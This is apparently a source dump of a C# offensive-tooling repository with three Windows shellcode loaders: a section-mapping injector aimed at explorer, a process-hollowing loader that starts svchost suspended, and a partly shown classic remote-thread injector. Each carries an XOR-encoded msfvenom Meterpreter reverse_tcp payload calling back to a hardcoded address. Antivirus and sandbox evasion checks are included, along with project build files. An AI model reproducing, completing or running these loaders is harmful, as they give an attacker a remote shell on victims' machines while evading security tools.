99 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
100 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
101 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
102 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
103 | 0x2f
104 | };
105 |
106 | int len = buf.Length;
107 | uint uLen = (uint)len;
108 |
109 | // Get a handle on the local process
110 | IntPtr lHandle = Process.GetCurrentProcess().Handle;
111 | Console.WriteLine($"Got handle {lHandle} on local process.");
112 |
113 | // Grab the right PID
114 | string targetedProc = "explorer"; //change :)
115 | int procId = Process.GetProcessesByName(targetedProc).First().Id;
116 |
117 | // Get a handle on the remote process
118 | IntPtr pHandle = OpenProcess(ProcessAllFlags, false, procId);
119 | Console.WriteLine($"Got handle {pHandle} on PID {procId} ({targetedProc}).");
120 |
121 | // Create a RWX memory section with the size of the payload using 'NtCreateSection'
122 | IntPtr sHandle = new IntPtr();
123 | long cStatus = NtCreateSection(ref sHandle, GenericAll, IntPtr.Zero, ref uLen, PageReadWriteExecute, SecCommit, IntPtr.Zero);
124 | Console.WriteLine($"Created new shared memory section with handle {sHandle}. Success: {cStatus == 0}.");
125 |
126 | // Map a view of the created section (sHandle) for the LOCAL process using 'NtMapViewOfSection'
127 | IntPtr baseAddrL = new IntPtr();
128 | uint viewSizeL = uLen;
129 | ulong sectionOffsetL = new ulong();
130 | long mStatusL = NtMapViewOfSection(sHandle, lHandle, ref baseAddrL, IntPtr.Zero, IntPtr.Zero, out sectionOffsetL, out viewSizeL, 2, 0, PageReadWrite);
131 | Console.WriteLine($"Mapped local memory section with base address {baseAddrL} (viewsize: {viewSizeL}, offset: {sectionOffsetL}). Success: {mStatusL == 0}.");
132 |
133 | // Map a view of the same section for the specified REMOTE process (pHandle) using 'NtMapViewOfSection'
134 | IntPtr baseAddrR = new IntPtr();
135 | uint viewSizeR = uLen;
136 | ulong sectionOffsetR = new ulong();
137 | long mStatusR = NtMapViewOfSection(sHandle, pHandle, ref baseAddrR, IntPtr.Zero, IntPtr.Zero, out sectionOffsetR, out viewSizeR, 2, 0, PageReadExecute);
138 | Console.WriteLine($"Mapped remote memory section with base address {baseAddrR} (viewsize: {viewSizeR}, offset: {sectionOffsetR}). Success: {mStatusR == 0}.");
139 |
140 | // Decode shellcode
141 | for (int i = 0; i < buf.Length; i++)
142 | {
143 | buf[i] = (byte)((uint)buf[i] ^ 0xfa);
144 | }
145 |
146 | // Copy shellcode to locally mapped view, which will be reflected in the remote mapping
147 | Marshal.Copy(buf, 0, baseAddrL, len);
148 | Console.WriteLine($"Copied shellcode to locally mapped memory at address {baseAddrL}.");
149 |
150 | // DEBUG: Read memory at remote address and verify it's the same as the intended shellcode
151 | byte[] remoteMemory = new byte[len];
152 | IntPtr noBytesRead = new IntPtr();
153 | bool result = ReadProcessMemory(pHandle, baseAddrR, remoteMemory, remoteMemory.Length, out noBytesRead);
154 | bool sameSame = ByteArrayCompare(buf, remoteMemory);
155 | Console.WriteLine($"DEBUG: Checking if shellcode is correctly placed remotely...");
156 | if (sameSame != true)
157 | {
158 | Console.WriteLine("DEBUG: NOT THE SAME! ABORTING EXECUTION.");
159 | return;
160 | }
161 | else
162 | {
163 | Console.WriteLine("DEBUG: OK.");
164 | }
165 | // END DEBUG
166 |
167 | // Execute the remotely mapped memory using 'CreateRemoteThread' (EWWW high-level APIs!!!)
168 | if (CreateRemoteThread(pHandle, IntPtr.Zero, 0, baseAddrR, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero)
169 | {
170 | Console.WriteLine("Injection done! Check your listener!");
171 | }
172 | else
173 | {
174 | Console.WriteLine("Injection failed!");
175 | }
176 |
177 | // Unmap the locally mapped section view using 'NtUnMapViewOfSection'
178 | uint uStatusL = NtUnmapViewOfSection(lHandle, baseAddrL);
179 | Console.WriteLine($"Unmapped local memory section. Success: {uStatusL == 0}.");
180 |
181 | // Close the section
182 | int clStatus = NtClose(sHandle);
183 | Console.WriteLine($"Closed memory section. Success: {clStatus == 0}.");
184 | }
185 | }
186 | }
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Sections Shellcode Process Injector")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Sections Shellcode Process Injector")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("08dbc2bf-e9f3-4ae4-b0cc-6e9c8767982d")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}
8 | Exe
9 | Sections_Shellcode_Process_Injector
10 | Sections Shellcode Process Injector
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sections Shellcode Process Injector", "Sections Shellcode Process Injector.csproj", "{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.ActiveCfg = Debug|x64
19 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.Build.0 = Debug|x64
20 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.ActiveCfg = Release|x64
23 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {48768DED-4F3D-43B9-8D5A-3771A7C4278E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace ProcessHollowing
5 | {
6 | public class Program
7 | {
8 | public const uint CREATE_SUSPENDED = 0x4;
9 | public const int PROCESSBASICINFORMATION = 0;
10 |
11 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
12 | public struct ProcessInfo
13 | {
14 | public IntPtr hProcess;
15 | public IntPtr hThread;
16 | public Int32 ProcessId;
17 | public Int32 ThreadId;
18 | }
19 |
20 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
21 | public struct StartupInfo
22 | {
23 | public uint cb;
24 | public string lpReserved;
25 | public string lpDesktop;
26 | public string lpTitle;
27 | public uint dwX;
28 | public uint dwY;
29 | public uint dwXSize;
30 | public uint dwYSize;
31 | public uint dwXCountChars;
32 | public uint dwYCountChars;
33 | public uint dwFillAttribute;
34 | public uint dwFlags;
35 | public short wShowWindow;
36 | public short cbReserved2;
37 | public IntPtr lpReserved2;
38 | public IntPtr hStdInput;
39 | public IntPtr hStdOutput;
40 | public IntPtr hStdError;
41 | }
42 |
43 | [StructLayout(LayoutKind.Sequential)]
44 | internal struct ProcessBasicInfo
45 | {
46 | public IntPtr Reserved1;
47 | public IntPtr PebAddress;
48 | public IntPtr Reserved2;
49 | public IntPtr Reserved3;
50 | public IntPtr UniquePid;
51 | public IntPtr MoreReserved;
52 | }
53 |
54 | [DllImport("kernel32.dll")]
55 | static extern void Sleep(uint dwMilliseconds);
56 |
57 | [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
58 | static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes,
59 | IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
60 | [In] ref StartupInfo lpStartupInfo, out ProcessInfo lpProcessInformation);
61 |
62 | [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
63 | private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass,
64 | ref ProcessBasicInfo procInformation, uint ProcInfoLen, ref uint retlen);
65 |
66 | [DllImport("kernel32.dll", SetLastError = true)]
67 | static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer,
68 | int dwSize, out IntPtr lpNumberOfbytesRW);
69 |
70 | [DllImport("kernel32.dll", SetLastError = true)]
71 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
72 |
73 | [DllImport("kernel32.dll", SetLastError = true)]
74 | static extern uint ResumeThread(IntPtr hThread);
75 |
76 | public static void Main(string[] args)
77 | {
78 | // AV evasion: Sleep for 10s and detect if time really passed
79 | DateTime t1 = DateTime.Now;
80 | Sleep(10000);
81 | double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
82 | if (deltaT < 9.5)
83 | {
84 | return;
85 | }
86 |
87 | // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
88 | // XORed with key 0xfa
89 | byte[] buf = new byte[511] {
90 | 0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
91 | 0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
92 | 0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
93 | 0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
94 | 0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
95 | 0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
96 | 0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
97 | 0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
98 | 0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
99 | 0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
100 | 0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
101 | 0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
102 | 0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
103 | 0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
104 | 0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
105 | 0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
106 | 0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
107 | 0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
108 | 0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
109 | 0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
110 | 0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
111 | 0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
112 | 0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
113 | 0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
114 | 0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
115 | 0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
116 | 0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
117 | 0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
118 | 0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
119 | 0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
120 | 0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
121 | 0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
122 | 0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
123 | 0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
124 | 0x2f
125 | };
126 |
127 | // Start 'svchost.exe' in a suspended state
128 | StartupInfo sInfo = new StartupInfo();
129 | ProcessInfo pInfo = new ProcessInfo();
130 | bool cResult = CreateProcess(null, "c:\\windows\\system32\\svchost.exe", IntPtr.Zero, IntPtr.Zero,
131 | false, CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo);
132 | Console.WriteLine($"Started 'svchost.exe' in a suspended state with PID {pInfo.ProcessId}. Success: {cResult}.");
133 |
134 | // Get Process Environment Block (PEB) memory address of suspended process (offset 0x10 from base image)
135 | ProcessBasicInfo pbInfo = new ProcessBasicInfo();
136 | uint retLen = new uint();
137 | long qResult = ZwQueryInformationProcess(pInfo.hProcess, PROCESSBASICINFORMATION, ref pbInfo, (uint)(IntPtr.Size * 6), ref retLen);
138 | IntPtr baseImageAddr = (IntPtr)((Int64)pbInfo.PebAddress + 0x10);
139 | Console.WriteLine($"Got process information and located PEB address of process at {"0x" + baseImageAddr.ToString("x")}. Success: {qResult == 0}.");
140 |
141 | // Get entry point of the actual process executable
142 | // This one is a bit complicated, because this address differs for each process (due to Address Space Layout Randomization (ASLR))
143 | // From the PEB (address we got in last call), we have to do the following:
144 | // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing
145 | // 2. Read the field 'e_lfanew', 4 bytes at offset 0x3C from executable address to get the offset for the PE header
146 | // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset
147 | // 4. Read the value at the RVA offset address to get the offset of the executable entrypoint from the executable address
148 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success!
149 |
150 | // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing
151 | byte[] procAddr = new byte[0x8];
152 | byte[] dataBuf = new byte[0x200];
153 | IntPtr bytesRW = new IntPtr();
154 | bool result = ReadProcessMemory(pInfo.hProcess, baseImageAddr, procAddr, procAddr.Length, out bytesRW);
155 | IntPtr executableAddress = (IntPtr)BitConverter.ToInt64(procAddr, 0);
156 | result = ReadProcessMemory(pInfo.hProcess, executableAddress, dataBuf, dataBuf.Length, out bytesRW);
157 | Console.WriteLine($"DEBUG: Executable base address: {"0x" + executableAddress.ToString("x")}.");
158 |
159 | // 2. Read the field 'e_lfanew', 4 bytes (UInt32) at offset 0x3C from executable address to get the offset for the PE header
160 | uint e_lfanew = BitConverter.ToUInt32(dataBuf, 0x3c);
161 | Console.WriteLine($"DEBUG: e_lfanew offset: {"0x" + e_lfanew.ToString("x")}.");
162 |
163 | // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset
164 | uint rvaOffset = e_lfanew + 0x28;
165 | Console.WriteLine($"DEBUG: RVA offset: {"0x" + rvaOffset.ToString("x")}.");
166 |
167 | // 4. Read the 4 bytes (UInt32) at the RVA offset to get the offset of the executable entrypoint from the executable address
168 | uint rva = BitConverter.ToUInt32(dataBuf, (int)rvaOffset);
169 | Console.WriteLine($"DEBUG: RVA value: {"0x" + rva.ToString("x")}.");
170 |
171 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success!
172 | IntPtr entrypointAddr = (IntPtr)((Int64)executableAddress + rva);
173 | Console.WriteLine($"Got executable entrypoint address: {"0x" + entrypointAddr.ToString("x")}.");
174 |
175 | // Carrying on, decode the XOR payload
176 | for (int i = 0; i < buf.Length; i++)
177 | {
178 | buf[i] = (byte)((uint)buf[i] ^ 0xfa);
179 | }
180 | Console.WriteLine("XOR-decoded payload.");
181 |
182 | // Overwrite the memory at the identified address to 'hijack' the entrypoint of the executable
183 | result = WriteProcessMemory(pInfo.hProcess, entrypointAddr, buf, buf.Length, out bytesRW);
184 | Console.WriteLine($"Overwrote entrypoint with payload. Success: {result}.");
185 |
186 | // Resume the thread to trigger our payload
187 | uint rResult = ResumeThread(pInfo.hThread);
188 | Console.WriteLine($"Triggered payload. Success: {rResult == 1}. Check your listener!");
189 | }
190 | }
191 | }
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Shellcode Process Hollowing")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Shellcode Process Hollowing")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d8b2f4f4-2b59-4457-b710-f15844570997")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Shellcode Process Hollowing.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {D8B2F4F4-2B59-4457-B710-F15844570997}
8 | Exe
9 | Shellcode_Process_Hollowing
10 | Shellcode Process Hollowing
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Shellcode Process Hollowing.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode Process Hollowing", "Shellcode Process Hollowing.csproj", "{D8B2F4F4-2B59-4457-B710-F15844570997}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.ActiveCfg = Debug|x64
19 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Debug|x64.Build.0 = Debug|x64
20 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.ActiveCfg = Release|x64
23 | {D8B2F4F4-2B59-4457-B710-F15844570997}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {21316190-097C-4FD2-A87D-733E0DA746F9}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Shellcode Process Injector/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.Security.Principal;
5 |
6 | namespace RemoteShinject
7 | {
8 | public class Program
9 | {
10 | [Flags]
11 | public enum ProcessAccessFlags : uint
12 | {
13 | All = 0x001F0FFF
14 | }
15 | [Flags]
16 | public enum AllocationType
17 | {
18 | Commit = 0x1000,
19 | Reserve = 0x2000
20 | }
21 |
22 | [Flags]
23 | public enum MemoryProtection
24 | {
25 | ExecuteReadWrite = 0x40
26 | }
27 |
28 | [DllImport("kernel32.dll", SetLastError = true)]
29 | public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);
30 |
31 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
32 | static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
33 |
34 | [DllImport("kernel32.dll", SetLastError = true)]
35 | public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
36 |
37 | [DllImport("kernel32.dll")]
38 | static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
39 |
40 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
41 | static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
42 |
43 | [System.Runtime.InteropServices.DllImport("kernel32.dll")]
44 | static extern IntPtr GetCurrentProcess();
45 |
46 | static bool IsElevated
47 | {
48 | get
49 | {
50 | return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);
51 | }
52 | }
53 |
54 | public static void Main(string[] args)
55 | {
56 | // Sandbox evasion
57 | IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
58 | if (mem == null)
59 | {
60 | return;
61 | }
62 |
63 | // Xor-encoded payload, key 0xfa
